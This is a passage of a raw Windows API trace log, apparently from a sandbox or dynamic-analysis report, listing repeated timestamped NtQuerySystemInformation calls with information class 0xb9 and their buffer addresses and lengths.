NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0263.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0263.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0263.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd10, Length=0x28, ResultLength=0x0) [0263.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd90, Length=0x28, ResultLength=0x0) [0263.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd90, Length=0x28, ResultLength=0x0) [0263.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcf0, Length=0x20, ResultLength=0x0) [0263.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x20, ResultLength=0x0) [0263.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x20, ResultLength=0x0) [0263.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x20, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcf0, Length=0x20, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x50, ResultLength=0x0) [0263.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x50, ResultLength=0x0) [0263.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x50, ResultLength=0x0) [0263.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x50, ResultLength=0x0) [0263.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x50, ResultLength=0x0) [0263.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x50, ResultLength=0x0) [0263.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x50, ResultLength=0x0) [0263.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x38, ResultLength=0x0) [0263.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x28, ResultLength=0x0) [0263.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x28, ResultLength=0x0) [0263.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x28, ResultLength=0x0) [0263.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x28, ResultLength=0x0) [0263.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x28, ResultLength=0x0) [0263.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x38, ResultLength=0x0) [0263.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd770, Length=0x28, ResultLength=0x0) [0263.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd770, Length=0x28, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd610, Length=0x20, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x20, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x20, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x20, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x38, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x38, ResultLength=0x0) [0263.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0263.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x20, ResultLength=0x0) [0263.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x20, ResultLength=0x0) [0263.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0264.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0264.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0264.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x50, ResultLength=0x0) [0264.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x50, ResultLength=0x0) [0264.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x50, ResultLength=0x0) [0264.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x50, ResultLength=0x0) [0264.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x38, ResultLength=0x0) [0264.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x28, ResultLength=0x0) [0264.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x28, ResultLength=0x0) [0264.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x28, ResultLength=0x0) [0264.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x28, ResultLength=0x0) [0264.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x38, ResultLength=0x0) [0264.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9c0, Length=0x28, ResultLength=0x0) [0264.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9c0, Length=0x28, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x38, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x20, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x38, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x20, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x20, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x20, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0264.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0264.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0264.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x50, ResultLength=0x0) [0264.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x50, ResultLength=0x0) [0264.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x50, ResultLength=0x0) [0264.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x50, ResultLength=0x0) [0264.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x38, ResultLength=0x0) [0264.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x28, ResultLength=0x0) [0264.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x28, ResultLength=0x0) [0264.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x28, ResultLength=0x0) [0264.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x28, ResultLength=0x0) [0264.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x38, ResultLength=0x0) [0264.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9c0, Length=0x28, ResultLength=0x0) [0264.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9c0, Length=0x28, ResultLength=0x0) [0264.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x38, ResultLength=0x0) [0264.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x20, ResultLength=0x0) [0264.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0264.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x38, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x20, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x20, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x20, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd30, Length=0x50, ResultLength=0x0) 